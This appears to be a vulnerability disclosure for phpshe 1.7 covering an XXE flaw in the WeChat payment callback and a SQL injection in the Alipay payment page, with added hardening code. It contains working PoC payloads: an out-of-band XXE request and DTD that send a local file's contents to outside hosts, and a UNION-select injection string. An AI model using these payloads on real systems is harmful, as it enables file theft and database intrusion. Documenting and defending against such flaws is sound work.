The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, where the wechat_getxml() function is called. wechat_getxml() is defined in hook/wechat.hook.php and in turn calls pe_getxml(). pe_getxml() is defined in include/function/global.func.php and calls simplexml_load_string() to parse the XML read from php://input. If the libxml version is < 2.9.0, simplexml_load_string() resolves external entities in its default mode.
The PoC is as below:
/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>
test.dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;
This can be used to read arbitrary files on the system.
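As an added hardening example (not phpshe's own code), the following is a replacement for the pe_getxml() pattern above that refuses any document carrying a DOCTYPE or ENTITY declaration, disables the external entity loader on PHP versions where it is still on by default, and parses with LIBXML_NONET so libxml never fetches a remote DTD. The function name safe_getxml() and the sample payloads are assumptions constructed for illustration:

```php
<?php
// Added example, not phpshe's own code. safe_getxml() is a hypothetical
// replacement for the pe_getxml() flow described in the report.

function safe_getxml(string $raw): ?array
{
    // A payment notification never needs a DOCTYPE, and every XXE payload
    // depends on one, so reject it before libxml sees the document.
    if (stripos($raw, '<!DOCTYPE') !== false || stripos($raw, '<!ENTITY') !== false) {
        return null;
    }

    // On libxml < 2.9.0 external entities are resolved by default; turn the
    // loader off explicitly. The function is deprecated on PHP 8.0+, where
    // entity loading is already disabled, so only call it on older runtimes.
    $previousLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $previousLoader = libxml_disable_entity_loader(true);
    }
    $previousErrors = libxml_use_internal_errors(true);

    // LIBXML_NONET forbids network access during parsing. LIBXML_NOENT is
    // deliberately NOT passed, so entity references are never substituted.
    $xml = simplexml_load_string($raw, 'SimpleXMLElement', LIBXML_NONET | LIBXML_NOCDATA);

    libxml_clear_errors();
    libxml_use_internal_errors($previousErrors);
    if ($previousLoader !== null) {
        libxml_disable_entity_loader($previousLoader);
    }

    if ($xml === false) {
        return null;
    }
    // Flatten the SimpleXML tree into a plain array for the caller.
    return json_decode(json_encode($xml), true);
}

// Constructed sample inputs: a benign WeChat-style notification and a
// document shaped like the XXE payload in the report.
$benign  = '<xml><out_trade_no>20190101</out_trade_no><result_code>SUCCESS</result_code></xml>';
$hostile = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><xml>&x;</xml>';

$parsed   = safe_getxml($benign);
$rejected = safe_getxml($hostile) === null;
```

With these inputs $parsed holds the two fields of the benign notification and $rejected is true: the hostile document is dropped by the DOCTYPE check before any parsing happens, and even a payload that slipped past that check could not load file:// or http:// resources under LIBXML_NONET with the entity loader disabled.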
The SQL injection is located in include/plugin/payment/alipay/pay.php, where $order_id is attacker-controlled. The return value of order_table() is then spliced directly into the SQL statement as the table name.
The PoC is as below:
/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_
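As an added hardening example (not phpshe's own code), the following shows how a table name that originates from a request parameter should be handled: compared with strict equality against a fixed whitelist, then backtick-quoted, while the order id itself is passed as a bound parameter rather than concatenated. safe_table_name(), build_order_query() and the table names in $allowed are assumptions for illustration:

```php
<?php
// Added example, not phpshe's own code. Demonstrates a whitelist for the
// table-name splice in alipay/pay.php described in the report.

function safe_table_name(string $candidate, array $allowed): string
{
    // Strict comparison against known names: any value containing backticks,
    // whitespace or SQL keywords is simply not in the list and is refused.
    if (!in_array($candidate, $allowed, true)) {
        throw new InvalidArgumentException('unknown table name');
    }
    // Quote the identifier anyway, so a future whitelist entry with an
    // unusual name still cannot change the shape of the query.
    return '`' . str_replace('`', '``', $candidate) . '`';
}

function build_order_query(string $table, string $orderId, array $allowed): array
{
    // Table name comes from the whitelist; the order id never touches the SQL
    // text and is handed to PDO/mysqli as a bound parameter.
    $sql = 'SELECT * FROM ' . safe_table_name($table, $allowed)
         . ' WHERE order_id = :order_id';
    return [$sql, [':order_id' => $orderId]];
}

// Hypothetical whitelist of payment tables (assumed names).
$allowed = ['pe_order', 'pe_order_product'];

// Constructed inputs: a legitimate table name, and the injected value from
// the report's PoC after URL decoding.
$ok = build_order_query('pe_order', '20190101', $allowed);

$rejected = false;
try {
    build_order_query('pay` where 1=1 union select 1,2,user(),4,5,6,7,8,9,10,11,12#_', '1', $allowed);
} catch (InvalidArgumentException $e) {
    $rejected = true;
}
```

The legitimate call yields "SELECT * FROM `pe_order` WHERE order_id = :order_id" with the id in the parameter array, and $rejected ends up true because the injected string is not an exact member of $allowed. Escaping the value is not a substitute here: identifiers cannot be bound as parameters, so a closed list of permitted names is the only reliable control.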